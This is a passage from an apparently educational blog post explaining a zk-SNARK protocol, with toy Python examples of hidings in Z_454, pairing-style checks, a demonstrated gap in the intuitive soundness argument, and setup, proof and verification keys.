&lt;p&gt;So, we have a field $\mathbb F_{113}$, a group $G=\mathbb Z_{454}$ and the element $3\in\mathbb Z_{454}$. We can use all of this to &lt;strong&gt;hide&lt;&#x2F;strong&gt; elements of $\mathbb F_{113}$ in $\mathbb Z_{454}$ as follows: the hiding of an element $x\in\mathbb F_{113}$ is $3^x$ modulo $454$.&lt;&#x2F;p&gt;
&lt;p&gt;$\mathbb F_{113} \longrightarrow \mathbb Z_{454}$&lt;br &#x2F;&gt;
$x \mapsto 3^x$&lt;&#x2F;p&gt;
&lt;p&gt;Here are some examples:&lt;&#x2F;p&gt;
&lt;p&gt;$1 \mapsto 3$&lt;br &#x2F;&gt;
$9 \mapsto 161$&lt;br &#x2F;&gt;
$10 \mapsto 29$&lt;br &#x2F;&gt;
$90 \mapsto 65$&lt;&#x2F;p&gt;
&lt;p&gt;Suppose someone chooses a random $s \in \mathbb F_{113}$, computes $3^s$ modulo $454$, and publishes the result. Say the result is $225$. So we know that $3^s \equiv 225$ modulo $454$. It’s tough to find out what $s$ is without going through all the possibilities. The brute force attack works here because numbers are small. For larger fields and groups, this becomes infeasible. Assume that’s the case for this toy example too. Say there’s no way for us to obtain the value of $s$.&lt;&#x2F;p&gt;
&lt;p&gt;Now, even though we don’t know $s$, we can compute other hidings off the hiding $3^s$. For example, we know that $3^s = 225$, so&lt;&#x2F;p&gt;
&lt;p&gt;$3^{10s} = 225^{10} = 343$&lt;&#x2F;p&gt;
&lt;p&gt;So, even if we only know the hiding of $s$, we can compute the hiding of $10s$. Moreover, we can compute the hiding of $as + b$ for any $a,b$ in $\mathbb F_{113}$: $3^{as+b} = (3^{s})^{a} \cdot 3^{b} = 225^{a} \cdot 3^{b}$. For example&lt;&#x2F;p&gt;
&lt;p&gt;$s \mapsto 225$&lt;br &#x2F;&gt;
$10s \mapsto 343$&lt;br &#x2F;&gt;
$3s+2 \mapsto 155$&lt;&#x2F;p&gt;
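&lt;p&gt;All of these numbers can be reproduced with three-argument &lt;code&gt;pow&lt;&#x2F;code&gt;. The sketch below uses the toy parameters from the text ($\mathbb F_{113}$, $G=\mathbb Z_{454}$, generator $3$) and derives the hidings of $10s$ and $3s+2$ from $E(s)=225$ alone.&lt;&#x2F;p&gt;

```python
MOD = 454  # the group Z_454
GEN = 3    # hides x in F_113 as 3**x mod 454

def hide(x):
    return pow(GEN, x, MOD)

print(hide(1), hide(9), hide(10), hide(90))  # 3 161 29 65

# Someone publishes the hiding of a secret s; say it is 225.
E_s = 225

# Without knowing s, we can still hide a*s + b for any a, b:
# 3**(a*s + b) = (3**s)**a * 3**b
def hide_affine(a, b):
    return pow(E_s, a, MOD) * pow(GEN, b, MOD) % MOD

print(hide_affine(10, 0))  # 343, the hiding of 10s
print(hide_affine(3, 2))   # 155, the hiding of 3s + 2
```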
&lt;h4 id=&quot;in-general&quot;&gt;In general&lt;&#x2F;h4&gt;
&lt;p&gt;The actual group $G$ where hidings live is not that important now. The example above should give a feel for what they look like. From now on, we’ll assume we have a way to compute hidings, and we’ll denote the hiding of an element $x\in\mathbb F_p$ by $E(x)$. In the examples above, $E(s) = 225$ and $E(10s) = 343$.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;checking-equations-on-hidings&quot;&gt;Checking equations on hidings&lt;&#x2F;h3&gt;
&lt;p&gt;We just saw that if we have the hiding $E(s)$ of an unknown element $s$, we can compute the hiding of $as+b$ for any $a$ and $b$. More generally if we have hidings $E(s)$ and $E(t)$, we can compute the hiding of $as + bt$ as&lt;br &#x2F;&gt;
$$E(as+bt) = E(s)^a E(t)^b.$$&lt;br &#x2F;&gt;
This is because we have $E(s)$, $E(t)$, and the rest involves group operations with those two elements. What we can’t do is compute $E(st)$, the hiding of $st$, without knowing the raw values $s$ and $t$.&lt;&#x2F;p&gt;
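&lt;p&gt;In the toy group of the previous example, this combination rule is a one-liner. The secrets $s$ and $t$ below are chosen arbitrarily and are only used to fabricate the two hidings.&lt;&#x2F;p&gt;

```python
MOD, GEN = 454, 3

s, t = 17, 42  # secrets, used only to build the two hidings
E_s, E_t = pow(GEN, s, MOD), pow(GEN, t, MOD)

a, b = 5, 7
# E(a*s + b*t), computed from the hidings alone:
combined = pow(E_s, a, MOD) * pow(E_t, b, MOD) % MOD
print(combined == pow(GEN, a * s + b * t, MOD))  # True
```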
&lt;p&gt;That’s sad, but it’s not the end of the world. We can get away without it. We will need an algorithm that helps us check relations on the original values when we have only their hidings. Precisely, we’ll need an algorithm $\mathcal A$ that takes $5$ hidings $E(a), E(b), E(c), E(t), E(d)$ and outputs $1$ if $ab - c = td$, and outputs $0$ otherwise. And the beauty of it is that it won’t reveal what the raw values $a,b,c,t,d$ are.&lt;&#x2F;p&gt;
&lt;p&gt;The actual algorithm $\mathcal A$ is something we need to sweep under the rug. The important thing is that such algorithms exist for some groups $G$, especially for elliptic curves. We suggest leaving this as a black box for now.&lt;&#x2F;p&gt;
&lt;p&gt;Note that $\mathcal A(E(a), E(b), E(c), E(0), E(0))$ outputs $1$ if and only if $ab=c$. This will also be useful! Since we’ll use this version a lot, we’ll call it the algorithm $\mathcal B$. So $\mathcal B$ takes $3$ hidings $E(a)$, $E(b)$ and $E(c)$ and outputs 1 if and only if $c = ab$.&lt;&#x2F;p&gt;
&lt;p&gt;For example, using the hidings from the previous section,&lt;br &#x2F;&gt;
$$\mathcal B(161, 29, 65) = 1.$$&lt;&#x2F;p&gt;
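&lt;p&gt;The real $\mathcal B$ relies on pairings over elliptic curves, but in the toy group we can fake it by brute-forcing discrete logarithms, which is feasible only because the numbers are tiny. This stand-in is purely illustrative, not a real construction.&lt;&#x2F;p&gt;

```python
MOD, GEN, ORDER = 454, 3, 113

def dlog(g):
    # Brute-force discrete log: find x with 3**x = g mod 454.
    for x in range(ORDER):
        if pow(GEN, x, MOD) == g:
            return x
    raise ValueError("not a power of the generator")

def toy_B(Ea, Eb, Ec):
    # Outputs 1 iff a*b = c in F_113 (toy stand-in for the pairing check).
    a, b, c = dlog(Ea), dlog(Eb), dlog(Ec)
    return 1 if a * b % ORDER == c else 0

print(toy_B(161, 29, 65))  # 1, since 9 * 10 = 90 and E(90) = 65
```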
&lt;h4 id=&quot;ok-but-why&quot;&gt;Ok, but why?&lt;&#x2F;h4&gt;
&lt;p&gt;Recall that the formula to construct $p$ from values $c_1,c_2,c_3,c_4$ is&lt;&#x2F;p&gt;
&lt;p&gt;$$p = vw - y,$$&lt;&#x2F;p&gt;
&lt;p&gt;where $v = c_1v_1 + c_2v_2 + c_3v_3 + c_4v_4$, $w = c_1w_1 + c_2w_2 + c_3w_3 + c_4w_4$ and $y=c_1y_1 + c_2y_2 + c_3y_3 + c_4y_4$. And if the prover did everything right, she’ll be able to find a polynomial $h$ such that $p = X(X-1)h$.&lt;&#x2F;p&gt;
&lt;p&gt;So the idea is that the prover sends $E(v(s))$, $E(w(s))$, $E(y(s))$ and $E(h(s))$ for some unknown value $s$. Then the verifier, who is going to have $E(s(s-1))$, can use algorithm $\mathcal A$ to check that $v(s)w(s) - y(s) = s(s-1)h(s)$. This is exactly $p(s) = s(s-1)h(s)$, the thing we wanted.&lt;&#x2F;p&gt;
&lt;p&gt;Sending the hidings of $v(s)$, $w(s)$, and $y(s)$ instead of the hiding of $p(s)$ has the advantage that the recipes for constructing $v, w$ and $y$ are much simpler than the recipe to build $p$. They are linear combinations of the base polynomials $v_i, w_i, y_i$. And, as we’ll see now, there’s a way to prove we correctly constructed those polynomials in the land of hidings.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;recap-2&quot;&gt;Recap&lt;&#x2F;h4&gt;
&lt;p&gt;Instead of raw values, the prover and verifier will have to work with hidings. The setup phase will produce enough hidings so the prover can compute the values it needs to show to the verifier. And that will be enough for him to be convinced that the prover properly executed the circuit. And with some tricks, we can guarantee that the prover can’t cheat.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;4-intuition-on-how-to-prove-correct-constructions-of-polynomials&quot;&gt;4. Intuition on how to prove correct constructions of polynomials&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s start addressing the third question: how does the verifier know that the prover followed the correct recipe to construct a polynomial?&lt;&#x2F;p&gt;
&lt;p&gt;What follows is an intuition on how the protocol solves this issue. Why do we say it is an intuition? Well, it has gaps. We’ll discuss the actual security proofs in other blogposts.&lt;&#x2F;p&gt;
&lt;p&gt;See for yourself if you can spot the gaps!&lt;&#x2F;p&gt;
&lt;h4 id=&quot;proving-correct-construction-of-v&quot;&gt;Proving correct construction of $v$&lt;&#x2F;h4&gt;
&lt;p&gt;Let’s start with $v$. What we want is to somehow send $E(v(s))$ to the verifier along with some redundant information that proves that $v(s) = c_1v_1(s) + c_2v_2(s) + c_3v_3(s) + c_4v_4(s)$. But without giving away the values $c_1,c_2,c_3,c_4$.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s go back to our example. We have $v_1,v_2,v_3,v_4$. And assume there was a setup phase in which random $s$ and $\alpha$ were sampled from $\mathbb F_p$, and the following evaluation and verification keys were publicly published&lt;br &#x2F;&gt;
Evaluation key:&lt;&#x2F;p&gt;
&lt;p&gt;$E(v_1(s)), E(v_2(s)), E(v_3(s)), E(v_4(s)),$&lt;br &#x2F;&gt;
$E(\alpha v_1(s)), E(\alpha v_2(s)), E(\alpha v_3(s)), E(\alpha v_4(s)).$&lt;&#x2F;p&gt;
&lt;p&gt;Verification Key:&lt;&#x2F;p&gt;
&lt;p&gt;$$E(\alpha)$$&lt;&#x2F;p&gt;
&lt;p&gt;The values $s$ and $\alpha$ are not known to anyone and were discarded. Suppose the prover has already executed the circuit, obtained $c_1,c_2,c_3,c_4$, and constructed $v$. She wants to send the verifier $v(s)$, but she doesn’t know $s$. She can then use the evaluation key to send its hiding: $E(v(s))$. So the prover constructs the following elements and sends them to the verifier:&lt;&#x2F;p&gt;
&lt;p&gt;$E(v(s)) = E(v_1(s))^{c_1} E(v_2(s))^{c_2} E(v_3(s))^{c_3} E(v_4(s))^{c_4} ,$&lt;&#x2F;p&gt;
&lt;p&gt;$E(\alpha v(s)) = E(\alpha v_1(s))^{c_1}E(\alpha v_2(s))^{c_2}E(\alpha v_3(s))^{c_3}E(\alpha v_4(s))^{c_4}.$&lt;&#x2F;p&gt;
&lt;p&gt;Note that the right-hand sides depend on elements known to the prover.&lt;&#x2F;p&gt;
&lt;p&gt;The verifier receives these two elements. Let’s call them $V=E(v(s))$ and $V’=E(\alpha v(s))$. But the verifier doesn’t trust the prover, so for the moment, he knows that he received two hidings $V=E(x)$ and $V’=E(y)$ of some elements $x$ and $y$. And he wants to be convinced that $x = c_1v_1(s) + c_2v_2(s) + c_3v_3(s) + c_4v_4(s)$ for some $c_1,c_2,c_3,c_4$. If those values correspond to a correct evaluation of the circuit is something we are not worrying about right now, and another check will cover that. What we are doing right now is just checking that $x$ is an evaluation at $s$ of a polynomial constructed in a very particular way.&lt;br &#x2F;&gt;
The verifier performs the following check using the verification key&lt;br &#x2F;&gt;
$$\text{Check that }\mathcal B(V, E(\alpha), V’)\text{ equals }1$$&lt;br &#x2F;&gt;
If the prover did everything right, the check would pass. From the verifier’s end, if the check passes, let’s see what he can be sure about. If the check passes, since $V=E(x)$ and $V’=E(y)$, he knows that $y=\alpha x$. Looking at the evaluation key, he sees that the prover doesn’t know the raw value of $\alpha$. The only thing the prover knows related to $\alpha$ is the hidings $E(\alpha v_i(s))$ in the evaluation key. So the only way the prover could have ever constructed the hiding of a multiple of $\alpha$ is from the values $E(\alpha v_i(s))$. And the only thing that can be constructed using them and the group operation is&lt;&#x2F;p&gt;
&lt;p&gt;$E(\alpha v_1(s))^{c_1}E(\alpha v_2(s))^{c_2}E(\alpha v_3(s))^{c_3}E(\alpha v_4(s))^{c_4} = E(c_1\alpha v_1(s) + c_2\alpha v_2(s) + c_3\alpha v_3(s) + c_4\alpha v_4(s))$&lt;br &#x2F;&gt;
$= E(\alpha(c_1v_1(s) + c_2v_2(s) + c_3v_3(s) + c_4v_4(s)))$&lt;&#x2F;p&gt;
&lt;p&gt;for some $c_1,c_2,c_3,c_4$. So $V’=E(\alpha x)$ has to be of the form above. This implies that $\alpha x = \alpha(c_1v_1(s) + c_2v_2(s) + c_3v_3(s) + c_4v_4(s))$, and therefore the verifier is in possession of&lt;br &#x2F;&gt;
$$V = E(x) = E(c_1v_1(s) + c_2v_2(s) + c_3v_3(s) + c_4v_4(s)).$$&lt;br &#x2F;&gt;
And that’s how the verifier gets convinced that the prover sent him $V=E(v(s))$ where $v$ is a polynomial constructed using the correct recipe!&lt;&#x2F;p&gt;
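&lt;p&gt;The whole exchange can be simulated in the toy group, again with a brute-force stand-in for $\mathcal B$. The values chosen for $s$, $\alpha$ and the $v_i(s)$ below are illustrative.&lt;&#x2F;p&gt;

```python
MOD, GEN, ORDER = 454, 3, 113

def hide(x):
    return pow(GEN, x % ORDER, MOD)

def dlog(g):
    return next(x for x in range(ORDER) if pow(GEN, x, MOD) == g)

def toy_B(Ea, Eb, Ec):
    return 1 if dlog(Ea) * dlog(Eb) % ORDER == dlog(Ec) else 0

# --- setup: sample s and alpha, publish the keys, discard the secrets ---
s, alpha = 29, 77         # illustrative "random" values
v_at_s = [4, 51, 12, 30]  # illustrative values v_i(s)
eval_key = [(hide(v), hide(alpha * v)) for v in v_at_s]
verif_key = hide(alpha)

# --- prover: combine the evaluation key with her coefficients c_i ---
c = [6, 4, 240, 24]
V = Vp = 1
for (Ev, Eav), ci in zip(eval_key, c):
    V = V * pow(Ev, ci, MOD) % MOD     # accumulates E(sum c_i v_i(s))
    Vp = Vp * pow(Eav, ci, MOD) % MOD  # accumulates E(alpha sum c_i v_i(s))

# --- verifier: one pairing-style check ---
print(toy_B(V, verif_key, Vp))  # 1
```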
&lt;h4 id=&quot;a-gap&quot;&gt;A gap&lt;&#x2F;h4&gt;
&lt;p&gt;Did you spot it? The problem lies in the phrase, “The only thing the prover knows related to $\alpha$ are the hidings $E(\alpha v_i(s))$ in the evaluation key.” That’s false because the verification key is also public and potentially known to the prover. The prover also has $E(\alpha)$. She could use it. For example, she could choose any $z$ and send the verifier $V=E(z)$ and $V’=E(\alpha)^z = E(\alpha z)$. And that would pass the verifier’s check without $z$ being $v(s)$ for any linear combination $v$ of the polynomials $v_i$.&lt;br &#x2F;&gt;
As things stand, the prover could sneak in such a $z$ if she wanted. It’s unclear how she could use that flexibility to construct fake proofs, and in fact she can’t without first breaking some cryptographic assumptions. But that proof takes another path. For now, let’s continue with our intuition, ignoring this fact.&lt;&#x2F;p&gt;
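&lt;p&gt;The forgery is just as easy to demonstrate in the toy group (same brute-force stand-in for $\mathcal B$, same illustrative $\alpha$): any $z$ passes the check.&lt;&#x2F;p&gt;

```python
MOD, GEN, ORDER = 454, 3, 113

def dlog(g):
    return next(x for x in range(ORDER) if pow(GEN, x, MOD) == g)

def toy_B(Ea, Eb, Ec):
    return 1 if dlog(Ea) * dlog(Eb) % ORDER == dlog(Ec) else 0

alpha = 77                      # secret sampled at setup...
E_alpha = pow(GEN, alpha, MOD)  # ...but its hiding is public

z = 23                           # any value, unrelated to the v_i
V_forged = pow(GEN, z, MOD)      # E(z)
Vp_forged = pow(E_alpha, z, MOD) # E(alpha)**z = E(alpha * z)

print(toy_B(V_forged, E_alpha, Vp_forged))  # 1: the check passes anyway
```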
&lt;h4 id=&quot;intuition-continues&quot;&gt;Intuition continues&lt;&#x2F;h4&gt;
&lt;p&gt;Even though there’s this glitch we just discussed, this idea gives an obvious use case of hidings to convince a verifier that a value was produced in a very particular way.&lt;&#x2F;p&gt;
&lt;p&gt;Since the prover needs to send also $E(w(s))$ and $E(y(s))$, there must be a trusted setup publishing enough hidings to construct them. This is what it would look like.&lt;&#x2F;p&gt;
&lt;p&gt;So to send all $E(v(s))$, $E(w(s))$ and $E(y(s))$ we need a trusted setup that samples random $s$, $\alpha_v$, $\alpha_w$, $\alpha_y$ and publishes&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Evaluation key: for all $i$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;$E(v_i(s)), E(\alpha_v v_i(s)),$&lt;br &#x2F;&gt;
$E(w_i(s)), E(\alpha_w w_i(s)),$&lt;br &#x2F;&gt;
$E(y_i(s)), E(\alpha_y y_i(s)),$&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Verification Key: $E(\alpha_v), E(\alpha_w), E(\alpha_y)$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;With all this, the prover can construct all the hidings and send them to the verifier. He follows all the checks and gets convinced that he received $E(v(s))$, $E(w(s))$ and $E(y(s))$, where $v, w$ and $y$ are linear combinations of the respective $v_i, w_i$ and $y_i$.&lt;&#x2F;p&gt;
&lt;p&gt;But there’s a problem with that. Let’s repeat what we just said in more detail to see it.&lt;br &#x2F;&gt;
The verifier gets convinced that he received $E(v(s))$, where $v(s)$ is &lt;strong&gt;some&lt;&#x2F;strong&gt; linear combination of the $v_i(s)$, say $v(s) = av_1(s) + bv_2(s) + cv_3(s) + dv_4(s)$ for some values $a,b,c,d$.&lt;br &#x2F;&gt;
On the other hand he also received $E(w(s))$, where $w(s)$ is &lt;strong&gt;some&lt;&#x2F;strong&gt; linear combination of the elements $w_i(s)$, say $w(s) = a’w_1(s) + b’w_2(s) + c’w_3(s) + d’w_4(s)$ for some values $a’,b’,c’,d’$. And that’s the problem. The verifier has no guarantee that $a=a’$, $b=b’$, $c=c’$, and $d=d’$. And that’s important! Because $v, w$ and $y$ need to be constructed using the same values $c_1,c_2,c_3,c_4$. That’s part of the recipe to construct $p$.&lt;&#x2F;p&gt;
&lt;p&gt;So we need something that connects the three hidings sent by the prover. Because so far, they are independent, and so are the three checks of the verifier.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;proving-construction-of-all-v-w-y&quot;&gt;Proving construction of all $v,w,y$&lt;&#x2F;h4&gt;
&lt;p&gt;The solution is to use the same trick cleverly yet again. And things start to get weird.&lt;br &#x2F;&gt;
The setup phase will now sample random $s, \alpha_v, \alpha_w, \alpha_y, \beta$ and publish the following keys&lt;&#x2F;p&gt;
&lt;p&gt;Evaluation key:&lt;&#x2F;p&gt;
&lt;p&gt;$E(v_i(s)), E(\alpha_v v_i(s)),$&lt;br &#x2F;&gt;
$E(w_i(s)), E(\alpha_w w_i(s)),$&lt;br &#x2F;&gt;
$E(y_i(s)), E(\alpha_y y_i(s)),$&lt;br &#x2F;&gt;
$E(\beta(v_i(s) + w_i(s) + y_i(s))).$&lt;&#x2F;p&gt;
&lt;p&gt;Verification Key:&lt;&#x2F;p&gt;
&lt;p&gt;$$E(\alpha_v), E(\alpha_w), E(\alpha_y), E(\beta)$$&lt;&#x2F;p&gt;
&lt;p&gt;As before the prover obtains $c_1,c_2,c_3,c_4$ and uses the evaluation key to compute $E(v(s))$, $E(\alpha_v v(s))$, $E(w(s))$, $E(\alpha_w w(s))$, $E(y(s))$, $E(\alpha_y y(s))$. But now she can also use the new elements of the evaluation key to compute $E(\beta (v(s) + w(s) + y(s)))$. She sends these seven elements to the verifier. The verifier receives seven hidings. Let’s denote them $V,V’, W, W’, Y, Y’, Z$ in the order the prover sent them.&lt;br &#x2F;&gt;
The verifier performs the following checks:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Check that $\mathcal B(V, E(\alpha_v), V&amp;#39;)$, $\mathcal B(W, E(\alpha_w), W&amp;#39;)$, and $\mathcal B(Y, E(\alpha_y), Y&amp;#39;)$ all equal $1$.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. He computes $VWY$ using the group operation and checks that $\mathcal B(VWY, E(\beta), Z)$ equals $1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If all these tests pass, the prover will convince the verifier that&lt;&#x2F;p&gt;
&lt;p&gt;$V = E(av_1(s) + bv_2(s) + cv_3(s) + dv_4(s)),$&lt;br &#x2F;&gt;
$W = E(aw_1(s) + bw_2(s) + cw_3(s) + dw_4(s))$&lt;br &#x2F;&gt;
$Y = E(ay_1(s) + by_2(s) + cy_3(s) + dy_4(s))$&lt;&#x2F;p&gt;
&lt;p&gt;for some elements $a,b,c,d$. And the reason is very similar to the previous case. The second check guarantees that $Z$ is the hiding of some multiple of $\beta$. The only way that it could have been produced is using the new hidings $E(\beta(v_i(s) + w_i(s) + y_i(s)))$. With such hidings the prover can only compute $E(\beta(v(s) + w(s) + y(s)))$ where $v,w$ and $y$ are linear combinations of the $v_i$, $w_i$ and $y_i$, respectively, with the &lt;strong&gt;same&lt;&#x2F;strong&gt; coefficients. That, together with the equality between $Z$ and $VWY$ that the second check enforces, implies that the coefficients in the raw values of $V, W$, and $Y$ are the same.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-about-h&quot;&gt;What about $h$?&lt;&#x2F;h4&gt;
&lt;p&gt;As we said previously, the prover is sending $E(v(s))$, $E(w(s))$ and $E(y(s))$ because the verifier can use them to check that $\mathcal A(E(v(s)), E(w(s)), E(y(s)), E(s(s-1)), E(h(s)))$ equals $1$. For that the verifier needs both $E(s(s-1))$ and $E(h(s))$. The value $E(s(s-1))$ is independent of the particular execution of the circuit and can be added to the verification key. Concerning $E(h(s))$, the prover needs to provide it. So she needs to be able to construct it. The hidings on the evaluation key are insufficient now since $h$ won’t be, in general, any linear combination of the polynomials $v_i, w_i, y_i$. The solution is to add $E(s^i)$ to the evaluation key for as many values $i$ as are needed to construct $h$ in the worst case.&lt;&#x2F;p&gt;
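&lt;p&gt;Computing $h$ is ordinary polynomial long division. Here is a generic sketch over a prime field, applied to the $p$ and $t=X(X-1)$ of the example; the modulus is illustrative.&lt;&#x2F;p&gt;

```python
P = 113  # an illustrative prime field

def poly_divmod(num, den):
    # Long division of polynomials mod P, coefficients low degree first.
    num = num[:]
    quot = [0] * (len(num) - len(den) + 1)
    inv_lead = pow(den[-1], P - 2, P)  # inverse of the leading coefficient
    for i in reversed(range(len(quot))):
        quot[i] = num[i + len(den) - 1] * inv_lead % P
        for j, d in enumerate(den):
            num[i + j] = (num[i + j] - quot[i] * d) % P
    return quot, num[:len(den) - 1]  # quotient and remainder

# p = 80X^2 - 80X and t = X(X-1) = X^2 - X, from the example.
p = [0, -80 % P, 80]
t = [0, -1 % P, 1]
h, rem = poly_divmod(p, t)
print(h, rem)  # [80] [0, 0]: zero remainder, so t divides p and h = 80
```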
&lt;p&gt;To keep this short, we will wait to add this to the protocol. We’ll cover the remaining issue and then write down the final protocol.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;recap-3&quot;&gt;Recap&lt;&#x2F;h4&gt;
&lt;p&gt;With all this, the prover can construct hidings of $v(s)$, $w(s)$,$y(s), h(s)$ and convince the verifier that she followed the correct recipe to build the polynomials $v,w,y$. And moreover that $p = vw-y=X(X-1)h$. This answers the third and fourth questions of the beginning!&lt;&#x2F;p&gt;
&lt;h2 id=&quot;5-inputs-and-outputs&quot;&gt;5. Inputs and outputs&lt;&#x2F;h2&gt;
&lt;p&gt;Let’s answer question 5. How does the verifier know that the prover used the input values $c_1$ and $c_2$? This is very simple. Recall that the verifier expects a proof of execution of the circuit on inputs $c_1,c_2$. So the prover executes the circuit, obtains the output $c_3$, and communicates $c_3$ to the verifier. So the verifier knows $c_1,c_2$, and $c_3$. In general, the verifier knows all public input and output values. Therefore we can modify the protocol slightly to allow the verifier to check inputs and outputs.&lt;&#x2F;p&gt;
&lt;p&gt;The polynomial $p$ is equal to $vw - y$ where $v = c_1v_1 + c_2v_2 + c_3v_3 + c_4v_4$ and similarly for $w$ and $y$. And the verifier is expecting to receive, for instance, the hiding $E(v(s))$ as part of the proof. But the input&#x2F;output part of $E(v(s))$ is something the verifier can compute by himself. More precisely, he knows $c_1,c_2,c_3$ and $E(v_1(s))$, $E(v_2(s))$ and $E(v_3(s))$ since they are part of the public evaluation key so far. So he can compute&lt;&#x2F;p&gt;
&lt;p&gt;$$E(c_1v_1(s) + c_2v_2(s) + c_3v_3(s)) = E(v_1(s))^{c_1} E(v_2(s))^{c_2} E(v_3(s))^{c_3}$$&lt;&#x2F;p&gt;
&lt;p&gt;This means that if the prover only sends him $V = E(c_4v_4(s))$, then the verifier can complete it with the above to obtain $E(v(s))$:&lt;br &#x2F;&gt;
$$E(v(s)) = E(c_1v_1(s) + c_2v_2(s) + c_3v_3(s))V$$&lt;br &#x2F;&gt;
And doing so, he gets the guarantee that the terms in $v(s)$ corresponding to the input&#x2F;output are the ones he expects.&lt;&#x2F;p&gt;
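&lt;p&gt;Completing the hiding is a single group multiplication, since $E(a)E(b)=E(a+b)$. A toy check in the group $\mathbb Z_{454}$, with illustrative values for the two parts:&lt;&#x2F;p&gt;

```python
MOD, GEN, ORDER = 454, 3, 113

def hide(x):
    return pow(GEN, x % ORDER, MOD)

io_part = 57      # c1*v1(s) + c2*v2(s) + c3*v3(s), computed by the verifier
prover_part = 91  # c4*v4(s), whose hiding the prover sends

V_IO = hide(io_part)
V = hide(prover_part)
print(V_IO * V % MOD == hide(io_part + prover_part))  # True
```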
&lt;p&gt;Note that if we do this, the prover won’t need the hidings $E(v_1(s))$, $E(v_2(s))$, and $E(v_3(s))$ anymore. So we are moving them to the verification key.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s write down what we have so far!&lt;&#x2F;p&gt;
&lt;h2 id=&quot;6-final-protocol&quot;&gt;6. Final protocol&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;almost-the-final-protocol-for-the-example&quot;&gt;Almost the final protocol for the example&lt;&#x2F;h3&gt;
&lt;p&gt;Recall that we assume there is a hiding function $E: \mathbb F_p \to G$ for some group $G$ and that there exists an algorithm $\mathcal A$ such that $\mathcal A(E(a), E(b), E(c), E(t), E(h)) = 1$ if and only if $ab-c=th$. We define $\mathcal B(E(a), E(b), E(c)) := \mathcal A(E(a), E(b), E(c), E(0), E(0))$ which outputs $1$ if and only if $ab=c$. Also recall that $E(a)E(b) = E(a+b)$.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;1-setup&quot;&gt;1. Setup&lt;&#x2F;h4&gt;
&lt;p&gt;Five random elements $s, \alpha_v, \alpha_w, \alpha_y, \beta$ are sampled from $\mathbb F_p$. Two public &lt;em&gt;keys&lt;&#x2F;em&gt; are generated from them: the evaluation key and the verification key&lt;br &#x2F;&gt;
3.1 Evaluation Key:&lt;&#x2F;p&gt;
&lt;p&gt;$E(v_4(s)), E(w_4(s)), E(y_4(s)),$&lt;br &#x2F;&gt;
$E(\alpha_vv_4(s)), E(\alpha_ww_4(s)), E(\alpha_yy_4(s)),$&lt;br &#x2F;&gt;
$E(\beta(v_4(s) + w_4(s) + y_4(s))),$&lt;br &#x2F;&gt;
$E(1)$&lt;&#x2F;p&gt;
&lt;p&gt;3.2 Verification Key:&lt;&#x2F;p&gt;
&lt;p&gt;$E(\alpha_v), E(\alpha_w), E(\alpha_y), E(\beta),$&lt;br &#x2F;&gt;
$E(v_1(s)), E(v_2(s)), E(v_3(s)),$&lt;br &#x2F;&gt;
$E(w_1(s)), E(w_2(s)), E(w_3(s)),$&lt;br &#x2F;&gt;
$E(y_1(s)), E(y_2(s)), E(y_3(s)),$&lt;br &#x2F;&gt;
$E(s(s-1))$&lt;&#x2F;p&gt;
&lt;h4 id=&quot;2-proof-generation&quot;&gt;2. Proof generation&lt;&#x2F;h4&gt;
&lt;p&gt;The prover executes the circuit with public input values $c_1, c_2$, obtains the output value $c_3$, and the intermediate value $c_4$. She computes&lt;&#x2F;p&gt;
&lt;p&gt;$v = c_1v_1 + c_2v_2 + c_3v_3 + c_4v_4$&lt;br &#x2F;&gt;
$w = c_1w_1 + c_2w_2 + c_3w_3 + c_4w_4$&lt;br &#x2F;&gt;
$y = c_1y_1 + c_2y_2 + c_3y_3 + c_4y_4$&lt;br &#x2F;&gt;
$p = vw - y$&lt;&#x2F;p&gt;
&lt;p&gt;She also computes $h$ such that $p = X(X-1)h$. The polynomial $h$ must be of degree $0$ for this particular circuit, so it is a constant value in $\mathbb F_p$.&lt;br &#x2F;&gt;
The prover computes the following hidings from the evaluation key.&lt;&#x2F;p&gt;
&lt;p&gt;$\pi = (E(c_4v_4(s)), E(\alpha_vc_4v_4(s)),$&lt;br &#x2F;&gt;
$E(c_4w_4(s)), E(\alpha_wc_4w_4(s)),$&lt;br &#x2F;&gt;
$E(c_4y_4(s)), E(\alpha_yc_4y_4(s)),$&lt;br &#x2F;&gt;
$E(\beta c_4(v_4(s) + w_4(s) + y_4(s))),$&lt;br &#x2F;&gt;
$E(h))$&lt;&#x2F;p&gt;
&lt;p&gt;The prover sends the output value $c_3$ to the verifier and the proof $\pi$.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;3-verification&quot;&gt;3. Verification&lt;&#x2F;h4&gt;
&lt;p&gt;The verifier receives the output value $c_3$ and the proof $\pi = (V, V’, W, W’, Y, Y’, Z, H)$. He computes the input&#x2F;output parts from the verification key.&lt;&#x2F;p&gt;
